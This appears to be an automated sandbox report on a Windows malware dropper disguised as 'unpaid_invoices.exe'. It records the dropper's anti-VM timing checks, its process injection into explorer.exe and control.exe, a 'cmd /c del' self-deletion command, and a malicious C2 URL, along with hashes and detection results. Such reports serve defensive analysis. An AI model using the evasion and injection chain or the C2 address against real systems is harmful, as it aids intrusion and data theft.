          Source: Binary string: control.pdbUGP source: ronkhfyq.exe, 00000002.00000002.303244940.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, ronkhfyq.exe, 00000002.00000002.303149130.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 1_2_00E12455 push ecx; ret 1_2_00E12468
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 2_2_0041D662 push eax; ret 2_2_0041D668
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 2_2_0041D66B push eax; ret 2_2_0041D6D2
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 2_2_0041D615 push eax; ret 2_2_0041D668
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 2_2_0041D6CC push eax; ret 2_2_0041D6D2
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 2_2_00417EE1 pushad ; retf 2_2_00417EE2
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 2_2_00E12455 push ecx; ret 2_2_00E12468
          Source: C:\Windows\SysWOW64\control.exe Code function: 17_2_04C1D0D1 push ecx; ret 17_2_04C1D0E4
          Source: C:\Windows\SysWOW64\control.exe Code function: 17_2_02EF7EE1 pushad ; retf 17_2_02EF7EE2
          Source: C:\Windows\SysWOW64\control.exe Code function: 17_2_02EFD6CC push eax; ret 17_2_02EFD6D2
          Source: C:\Windows\SysWOW64\control.exe Code function: 17_2_02EFD66B push eax; ret 17_2_02EFD6D2
          Source: C:\Windows\SysWOW64\control.exe Code function: 17_2_02EFD662 push eax; ret 17_2_02EFD668
          Source: C:\Windows\SysWOW64\control.exe Code function: 17_2_02EFD615 push eax; ret 17_2_02EFD668
          Source: C:\Users\user\Desktop\unpaid_invoices.exe File created: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exeCode function: 1_2_00E118A0 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00E118A0
          Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\unpaid_invoices.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\control.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe RDTSC instruction interceptor: First address: 0000000000408C04 second address: 0000000000408C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe RDTSC instruction interceptor: First address: 0000000000408F8E second address: 0000000000408F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 0000000002EE8C04 second address: 0000000002EE8C0A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe RDTSC instruction interceptor: First address: 0000000002EE8F8E second address: 0000000002EE8F94 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exe Last function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-6470
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 2_2_00408EC0 rdtsc 2_2_00408EC0
          Source: C:\Windows\explorer.exe File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe API coverage: 4.4 %
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\unpaid_invoices.exe Code function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
          Source: C:\Users\user\Desktop\unpaid_invoices.exe Code function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
          Source: C:\Users\user\Desktop\unpaid_invoices.exe Code function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\unpaid_invoices.exe API call chain: ExitProcess graph end nodegraph_0-3509
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe API call chain: ExitProcess graph end nodegraph_1-6471
          Source: explorer.exe, 0000001B.00000003.452231677.0000000009B81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewB
          Source: explorer.exe, 0000001B.00000003.486435704.0000000009B37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B}
          Source: explorer.exe, 0000001B.00000003.464937366.0000000009B80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f563
          Source: explorer.exe, 00000005.00000000.249331621.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 0000001B.00000003.443034408.0000000009C0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00X
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 1_2_00E17AA5 IsDebuggerPresent,1_2_00E17AA5
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 1_2_00E1559A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00E1559A
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 1_2_00E186FE __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_00E186FE
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 2_2_00408EC0 rdtsc 2_2_00408EC0
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exe Process token adjusted: Debug
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 2_2_0040A130 LdrLoadDll,2_2_0040A130
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 1_2_00E143DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00E143DC
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 1_2_00E143AB SetUnhandledExceptionFilter,1_2_00E143AB
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 2_2_00E143DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00E143DC
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 2_2_00E143AB SetUnhandledExceptionFilter,2_2_00E143AB

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: unknown protection: read write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Thread register set: target process: 3616
          Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3616
          Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3080
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Process created: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
          Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\ronkhfyq.exe"
          Source: explorer.exe, 00000005.00000000.348518528.0000000005E60000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.265421157.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.286646709.0000000005E60000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.265421157.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.280419842.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.280644910.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.265421157.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.280644910.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342562960.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager,
          Source: explorer.exe, 00000005.00000000.265421157.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.280644910.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.342562960.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
          Source: explorer.exe, 0000001B.00000000.470520461.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.458823755.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000000.483237143.0000000000A48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanUse
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 1_2_00E13293 cpuid 1_2_00E13293
          Source: C:\Users\user\AppData\Local\Temp\ronkhfyq.exe Code function: 1_2_00E13ED8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00E13ED8
          Source: C:\Users\user\Desktop\unpaid_invoices.exe Code function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: explorer.exe, 0000001B.00000003.441618102.0000000009AAD000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.467442285.0000000009AB4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.442818303.0000000009AB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Program Files\Windows Defender\MSASCui.exe

          Stealing of Sensitive Information

          Source: Yara match File source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match File source: 1.2.ronkhfyq.exe.d80000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.ronkhfyq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.ronkhfyq.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.ronkhfyq.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.ronkhfyq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.ronkhfyq.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.ronkhfyq.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.ronkhfyq.exe.d80000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.0.ronkhfyq.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000002.00000000.237595371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.275722740.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000000.290093186.000000000D381000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.499446958.0000000003010000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.303094021.0000000000A40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.303067369.0000000000A10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000000.235077972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.499304086.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.238404371.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000011.00000002.499413072.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.302895088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | 2 Command and Scripting Interpreter | Path Interception | 1 Access Token Manipulation | 1 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 System Shutdown/Reboot
          Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 312 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | 1 Clipboard Data | Exfiltration Over Bluetooth | 1 Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Access Token Manipulation | Security Account Manager | 271 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 312 Process Injection | NTDS | 2 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | 3 Obfuscated Files or Information | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Software Packing | DCSync | 114 System Information Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Behavior Graph ID: 626537, Sample: unpaid_invoices.exe, Startdate: 14/05/2022, Architecture: WINDOWS, Score: 100
          Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 5 other signatures
          • unpaid_invoices.exe (started); dropped C:\Users\user\AppData\Local\...\ronkhfyq.exe, PE32; started ronkhfyq.exe
          • ronkhfyq.exe (started): Multi AV Scanner detection for dropped file; Tries to detect virtualization through RDTSC time measurements; started ronkhfyq.exe
          • ronkhfyq.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Queues an APC in another process (thread injection); injected explorer.exe
          • explorer.exe (injected); started control.exe
          • control.exe (started): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; started cmd.exe and explorer.exe
          • cmd.exe (started); started conhost.exe
          • explorer.exe (started)
          • conhost.exe (started)

          Source | Detection | Scanner | Label | Link
          unpaid_invoices.exe | 100% | Joe Sandbox ML | |
          Source | Detection | Scanner | Label | Link
          C:\Users\user\AppData\Local\Temp\ronkhfyq.exe | 35% | Virustotal | | Browse
          Source | Detection | Scanner | Label | Link | Download
          1.2.ronkhfyq.exe.d80000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          2.0.ronkhfyq.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          2.2.ronkhfyq.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          2.0.ronkhfyq.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          2.0.ronkhfyq.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File
          No Antivirus matches
          Source | Detection | Scanner | Label | Link
          http://crl.m | 0% | URL Reputation | safe |
          www.beamaster.info/p0ip/ | 1% | Virustotal | | Browse
          www.beamaster.info/p0ip/ | 100% | Avira URL Cloud | malware |
          No contacted domains info
          Name | Malicious | Antivirus Detection | Reputation
          www.beamaster.info/p0ip/ | true | 1%, Virustotal, Browse; Avira URL Cloud: malware | low
          Name | Source | Malicious | Antivirus Detection | Reputation
          http://crl.m | explorer.exe, 0000001B.00000003.441376750.0000000009BD0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000003.442769912.0000000009BD0000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
          http://nsis.sf.net/NSIS_ErrorError | unpaid_invoices.exe | false | | high
            No contacted IP infos
            Joe Sandbox Version:34.0.0 Boulder Opal
            Analysis ID:626537
            Start date and time: 14/05/2022 11:30:18 (2022-05-14 11:30:18 +02:00)
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 17s
            Hypervisor based Inspection enabled:false
            Report type:full
            Sample file name:unpaid_invoices.exe
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed:36
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@10/4@0/0
            EGA Information:
            • Successful, ratio: 100%
            HDC Information:
            • Successful, ratio: 70.2% (good quality ratio 65.5%)
            • Quality average: 73.3%
            • Quality standard deviation: 30.8%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 92
            • Number of non-executed functions: 130
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Adjust boot time
            • Enable AMSI
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SearchUI.exe, BackgroundTransferHost.exe, WerFault.exe, ShellExperienceHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, mobsync.exe, wuapihost.exe
            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtCreateFile calls found.
            • Report size getting too big, too many NtEnumerateKey calls found.
            • Report size getting too big, too many NtEnumerateValueKey calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryAttributesFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            Time | Type | Description
            11:32:38 | API Interceptor | 270x Sleep call for process: explorer.exe modified
            No context
            Process:C:\Users\user\Desktop\unpaid_invoices.exe
            File Type:data
            Category:dropped
            Size (bytes):175615
            Entropy (8bit):7.989556868411482
            Encrypted:false
            SSDEEP:3072:fpfeyeT9cCEBJbcxy5/96Epl522sTJ21MmJHNcFRar83oCMmuiRV:BfeJT9cC8Ay5/96u522CJ21x/7SMA
            MD5:6EAEEDA92193DFCFE0793EBB42234083
            SHA1:B5F2F6F5DD57C06CAB8AC584FBA3EB1C074BA8B0
            SHA-256:AA6EB5A7ED6934D8A72CE1574976416EB0AE4F9D2D6E4E8D30CA08552E240D89
            SHA-512:FDF3F9F395848419CB8769475996DD496E0192B646238BC8D1A80A117ADB57E160460B89DA914C9A060E8695356DA8B960FEDAC15E6D2CBD55321679E1861481
            Malicious:false
            Reputation:low
            Process:C:\Users\user\Desktop\unpaid_invoices.exe
            File Type:data
            Category:dropped
            Size (bytes):5258
            Entropy (8bit):6.125929290266708
            Encrypted:false
            SSDEEP:96:H9FmMmXqfFRM47D8A/g6poDDRFaqyhkjhtnNb79BNophoEHEdl9:HnmMmqfFi47V/g6oDDP7rNYAl9
            MD5:8668A0506B4C9208D6EBFF46EE5D6D1F
            SHA1:07B662FBBF9D91ED7450E7F11F53DC6F007A24C6
            SHA-256:81C2E10EC9F98F9B5613C1D82A8BBA6FDFCDAE10A1C168B953A5EFF0673BF2A1
            SHA-512:059389C79C4CC6012B16614837E0987C142679C130E6C9F28C11F24021E1BA9F945E3087E1628F60D1BBAE3B9D006B34A7DAC0525EF23595A9934498D681A7DB
            Malicious:false
            Reputation:low
            Process:C:\Users\user\Desktop\unpaid_invoices.exe
            File Type:data
            Category:dropped
            Size (bytes):274229
            Entropy (8bit):7.541319632368503
            Encrypted:false
            SSDEEP:6144:bfeJT9cC8Ay5/96u522CJ21x/7SMYgIVK:bfcv8Ay5/15LCJ21FzZIQ
            MD5:46CFE846A786EBB38056666F469AA5E5
            SHA1:53AB659100C687E483274CE564475D4E9DF31456
            SHA-256:95E7E8F3720E21A18CF700156601444373005ED8FA1F283CB949FC6FAFA842FB
            SHA-512:6B41F8FB00D09A2F2365BC33067F59027122D08F880C11070874402AA0C97E5D844054887F4E76ADF5EE7C8D2CEACC48F60D14F7150D3D29670A0F445403922C
            Malicious:false
            Reputation:low
            Process:C:\Users\user\Desktop\unpaid_invoices.exe
            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
            Category:dropped
            Size (bytes):80384
            Entropy (8bit):6.295520176749251
            Encrypted:false
            SSDEEP:1536:FnUDaC+416cLkMoxA705mPtcX/4pi2sWjcdowE:FGaGIcQn/ui5owE
